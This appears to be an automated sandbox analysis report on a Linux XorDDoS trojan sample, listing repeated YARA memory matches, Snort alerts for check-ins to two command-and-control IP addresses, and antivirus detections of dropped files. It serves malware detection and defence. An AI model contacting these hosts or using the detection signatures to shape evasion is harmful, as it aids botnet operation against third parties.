Process Memory Space: eTASxT3bjO.elf PID: 5450	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5453	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5453	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5455	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5455	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1dd3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e94:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5458	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5458	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe43:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf04:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5461	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5461	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1811:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5470	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5470	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5473	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5473	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5475	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5475	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2105:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5478	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5478	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5481	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5481	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5493	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5493	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1811:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5496	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5496	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd22:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5498	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5498	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5501	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5501	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1b30:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1bf1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5504	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5504	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5530	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5530	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5533	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5533	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9a2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa63:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5535	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5535	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd22:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5538	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5538	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1811:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5541	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5541	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5548	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5548	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5551	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5551	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5553	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5553	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1162:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1223:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5556	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5556	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd22:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5558	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5558	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1fd1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2092:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5565	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5565	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21ba:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5568	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5568	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1cb2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1d73:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5570	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5570	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd29:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xdea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5573	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5573	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1168:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1229:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5576	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5576	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9a2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa63:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5582	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5582	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1dd9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e9a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5585	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5585	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5589	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5589	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5592	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5592	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1fdd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x209e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5594	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5594	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20fa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21bb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5601	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5601	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5604	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5604	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5606	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5606	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1dd3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e94:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5609	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5609	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1b30:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1bf1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5612	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5612	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xcc1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xd82:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5620	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5620	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1811:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5623	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5623	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe43:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf04:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5625	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5625	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1041:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1102:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5628	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5628	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5631	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5631	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd28:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xde9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5638	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5638	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5641	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5641	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x116e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x122f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5643	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5643	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5646	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5646	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9a2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa63:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5648	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5648	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5655	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5655	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1811:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5657	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5657	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1162:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1223:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5660	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5660	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1932:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19f3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5663	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5663	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1fdd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x209e:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5666	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5666	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1b30:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1bf1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5672	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5672	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1162:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1223:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5675	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5675	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9a2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa63:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5677	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5677	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5680	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5680	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5683	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5683	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1811:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x18d2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5691	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5691	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xba0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xc61:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5694	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5694	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9a2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa63:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5696	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5696	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20fe:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21bf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5699	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5699	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20f8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: eTASxT3bjO.elf PID: 5702	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: eTASxT3bjO.elf PID: 5702	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x881:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x942:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 481 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.13 - Destination IP: 199.188.111.217

Timestamp:	04/09/24-18:18:13.475831
SID:	2020381
Source Port:	47930
Destination Port:	1520
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.13 - Destination IP: 137.175.88.241

Timestamp:	04/09/24-18:16:32.776231
SID:	2020381
Source Port:	41150
Destination Port:	1520
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: eTASxT3bjO.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/bin/exnwncfijy	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/lib/libudev.so	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/ygqhgbaeei	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/svkksitypo	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/zqylkjndwx	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/uruvhkrplh	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/xaxopmwzau	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/ghgagimgub	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/eoogzzilvp	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/evbjclrakz	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/yfaogzsdtv	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/kffnhivjdw	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/xjdcsmwtwe	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/mqnpjwpasf	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b
Source: /usr/bin/vijnytmbcx	Avira: detection malicious, Label: TR/ELF.DDoS.Xor.b

Found malware configuration

Source: eTASxT3bjO.elf

Malware Configuration Extractor: XorDDoS {"C2 list": []}

Multi AV Scanner detection for submitted file

Source: eTASxT3bjO.elf

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: /usr/bin/exnwncfijy	Joe Sandbox ML: detected
Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/ygqhgbaeei	Joe Sandbox ML: detected
Source: /usr/bin/svkksitypo	Joe Sandbox ML: detected
Source: /usr/bin/zqylkjndwx	Joe Sandbox ML: detected
Source: /usr/bin/uruvhkrplh	Joe Sandbox ML: detected
Source: /usr/bin/xaxopmwzau	Joe Sandbox ML: detected
Source: /usr/bin/ghgagimgub	Joe Sandbox ML: detected
Source: /usr/bin/wvicexcnqi	Joe Sandbox ML: detected
Source: /usr/bin/eoogzzilvp	Joe Sandbox ML: detected
Source: /usr/bin/evbjclrakz	Joe Sandbox ML: detected
Source: /usr/bin/yfaogzsdtv	Joe Sandbox ML: detected
Source: /usr/bin/kffnhivjdw	Joe Sandbox ML: detected
Source: /usr/bin/xjdcsmwtwe	Joe Sandbox ML: detected
Source: /usr/bin/mqnpjwpasf	Joe Sandbox ML: detected
Source: /usr/bin/vijnytmbcx	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: eTASxT3bjO.elf

Joe Sandbox ML: detected

Source: /tmp/eTASxT3bjO.elf (PID: 5434)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.13:41150 -> 137.175.88.241:1520
Source: Traffic	Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.13:47930 -> 199.188.111.217:1520

Source: global traffic	TCP traffic: 192.168.2.13:41150 -> 137.175.88.241:1520
Source: global traffic	TCP traffic: 192.168.2.13:47930 -> 199.188.111.217:1520

Source: unknown	TCP traffic detected without corresponding DNS query: 199.188.111.217
Source: unknown	TCP traffic detected without corresponding DNS query: 199.188.111.217
Source: unknown	TCP traffic detected without corresponding DNS query: 199.188.111.217
Source: unknown	TCP traffic detected without corresponding DNS query: 199.188.111.217
Source: unknown	TCP traffic detected without corresponding DNS query: 199.188.111.217
Source: unknown	TCP traffic detected without corresponding DNS query: 199.188.111.217
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
